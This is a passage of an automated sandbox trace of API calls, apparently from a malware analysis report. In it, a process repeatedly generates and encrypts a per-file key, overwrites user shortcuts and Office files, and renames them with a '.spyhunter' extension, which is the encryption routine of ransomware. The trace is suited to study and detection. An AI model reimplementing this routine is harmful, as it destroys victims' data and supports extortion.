pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.spyhunter") returned 93 [0140.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.spyhunter")) returned 1 [0140.247] GetProcessHeap () returned 0x2c0000 [0140.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.247] GetProcessHeap () returned 0x2c0000 [0140.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.247] GetProcessHeap () returned 0x2c0000 [0140.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63e58 | out: hHeap=0x2c0000) returned 1 [0140.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4b8 | out: pbBuffer=0x248f4b8) returned 1 [0140.247] GetProcessHeap () returned 0x2c0000 [0140.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4b0*=0x30) returned 1 [0140.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 84 [0140.248] StrStrW (lpFirst="Global.LNK", lpSrch=".txt") returned 0x0 [0140.248] GetProcessHeap () returned 0x2c0000 [0140.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.248] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f474*=0x59a, lpOverlapped=0x0) returned 1 [0140.387] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffa66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.387] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x59a, lpNumberOfBytesWritten=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f474*=0x59a, lpOverlapped=0x0) returned 1 [0140.387] GetProcessHeap () returned 0x2c0000 [0140.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.387] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.387] WriteFile (in: hFile=0x184, lpBuffer=0x248f4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x248f4b4*, lpNumberOfBytesWritten=0x248f474*=0x4, lpOverlapped=0x0) returned 1 [0140.388] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f474, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f474*=0x30, lpOverlapped=0x0) returned 1 [0140.388] CloseHandle (hObject=0x184) returned 1 [0140.388] GetProcessHeap () returned 0x2c0000 [0140.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0140.388] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.spyhunter") returned 94 [0140.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk.spyhunter")) returned 1 [0140.389] GetProcessHeap () returned 0x2c0000 [0140.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0140.389] GetProcessHeap () returned 0x2c0000 [0140.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.389] GetProcessHeap () returned 0x2c0000 [0140.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f399e8 | out: hHeap=0x2c0000) returned 1 [0140.389] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4b0 | out: pbBuffer=0x248f4b0) returned 1 [0140.389] GetProcessHeap () returned 0x2c0000 [0140.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.389] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4a8*=0x30) returned 1 [0140.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0140.389] StrStrW (lpFirst="Internet Explorer (2).lnk", lpSrch=".txt") returned 0x0 [0140.389] GetProcessHeap () returned 0x2c0000 [0140.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.390] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f46c*=0x5ad, lpOverlapped=0x0) returned 1 [0140.390] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffa53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.390] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x5ad, lpNumberOfBytesWritten=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f46c*=0x5ad, lpOverlapped=0x0) returned 1 [0140.390] GetProcessHeap () returned 0x2c0000 [0140.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.390] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.391] WriteFile (in: hFile=0x184, lpBuffer=0x248f4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x248f4ac*, lpNumberOfBytesWritten=0x248f46c*=0x4, lpOverlapped=0x0) returned 1 [0140.391] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f46c*=0x30, lpOverlapped=0x0) returned 1 [0140.391] CloseHandle (hObject=0x184) returned 1 [0140.391] GetProcessHeap () returned 0x2c0000 [0140.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0140.391] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.spyhunter") returned 146 [0140.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.spyhunter")) returned 1 [0140.392] GetProcessHeap () returned 0x2c0000 [0140.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0140.392] GetProcessHeap () returned 0x2c0000 [0140.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.392] GetProcessHeap () returned 0x2c0000 [0140.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de7bb0 | out: hHeap=0x2c0000) returned 1 [0140.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4b0 | out: pbBuffer=0x248f4b0) returned 1 [0140.392] GetProcessHeap () returned 0x2c0000 [0140.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4a8*=0x30) returned 1 [0140.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0140.393] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0140.393] GetProcessHeap () returned 0x2c0000 [0140.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.393] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f46c*=0x8dd, lpOverlapped=0x0) returned 1 [0140.394] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffff723, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.394] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x8dd, lpNumberOfBytesWritten=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f46c*=0x8dd, lpOverlapped=0x0) returned 1 [0140.394] GetProcessHeap () returned 0x2c0000 [0140.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.394] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.394] WriteFile (in: hFile=0x184, lpBuffer=0x248f4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x248f4ac*, lpNumberOfBytesWritten=0x248f46c*=0x4, lpOverlapped=0x0) returned 1 [0140.394] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f46c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f46c*=0x30, lpOverlapped=0x0) returned 1 [0140.394] CloseHandle (hObject=0x184) returned 1 [0140.394] GetProcessHeap () returned 0x2c0000 [0140.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0140.394] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.spyhunter") returned 138 [0140.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.spyhunter")) returned 1 [0140.395] GetProcessHeap () returned 0x2c0000 [0140.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0140.396] GetProcessHeap () returned 0x2c0000 [0140.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.396] GetProcessHeap () returned 0x2c0000 [0140.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4aa0 | out: hHeap=0x2c0000) returned 1 [0140.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4a8 | out: pbBuffer=0x248f4a8) returned 1 [0140.396] GetProcessHeap () returned 0x2c0000 [0140.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4a0*=0x30) returned 1 [0140.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.396] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0140.396] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0140.396] GetProcessHeap () returned 0x2c0000 [0140.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.396] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f464*=0x19c, lpOverlapped=0x0) returned 1 [0140.397] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.397] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x248f464, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f464*=0x19c, lpOverlapped=0x0) returned 1 [0140.397] GetProcessHeap () returned 0x2c0000 [0140.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.397] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.397] WriteFile (in: hFile=0x184, lpBuffer=0x248f4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f464, lpOverlapped=0x0 | out: lpBuffer=0x248f4a4*, lpNumberOfBytesWritten=0x248f464*=0x4, lpOverlapped=0x0) returned 1 [0140.398] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f464, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f464*=0x30, lpOverlapped=0x0) returned 1 [0140.398] CloseHandle (hObject=0x184) returned 1 [0140.398] GetProcessHeap () returned 0x2c0000 [0140.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0140.398] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.spyhunter") returned 132 [0140.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.spyhunter")) returned 1 [0140.399] GetProcessHeap () returned 0x2c0000 [0140.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0140.399] GetProcessHeap () returned 0x2c0000 [0140.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.399] GetProcessHeap () returned 0x2c0000 [0140.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf928 | out: hHeap=0x2c0000) returned 1 [0140.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4a8 | out: pbBuffer=0x248f4a8) returned 1 [0140.400] GetProcessHeap () returned 0x2c0000 [0140.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4a0*=0x30) returned 1 [0140.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.400] GetProcessHeap () returned 0x2c0000 [0140.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.400] GetProcessHeap () returned 0x2c0000 [0140.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8ec0 | out: hHeap=0x2c0000) returned 1 [0140.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4a0 | out: pbBuffer=0x248f4a0) returned 1 [0140.400] GetProcessHeap () returned 0x2c0000 [0140.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f498*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f498*=0x30) returned 1 [0140.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.400] GetProcessHeap () returned 0x2c0000 [0140.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.400] GetProcessHeap () returned 0x2c0000 [0140.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8d88 | out: hHeap=0x2c0000) returned 1 [0140.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f498 | out: pbBuffer=0x248f498) returned 1 [0140.401] GetProcessHeap () returned 0x2c0000 [0140.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f490*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f490*=0x30) returned 1 [0140.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.402] GetProcessHeap () returned 0x2c0000 [0140.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.402] GetProcessHeap () returned 0x2c0000 [0140.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0be0 | out: hHeap=0x2c0000) returned 1 [0140.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f498 | out: pbBuffer=0x248f498) returned 1 [0140.402] GetProcessHeap () returned 0x2c0000 [0140.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.402] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f490*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f490*=0x30) returned 1 [0140.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.402] GetProcessHeap () returned 0x2c0000 [0140.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.402] GetProcessHeap () returned 0x2c0000 [0140.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0ab8 | out: hHeap=0x2c0000) returned 1 [0140.402] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f490 | out: pbBuffer=0x248f490) returned 1 [0140.402] GetProcessHeap () returned 0x2c0000 [0140.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f488*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f488*=0x30) returned 1 [0140.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0140.403] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".txt") returned 0x0 [0140.403] GetProcessHeap () returned 0x2c0000 [0140.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.403] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f44c*=0x122, 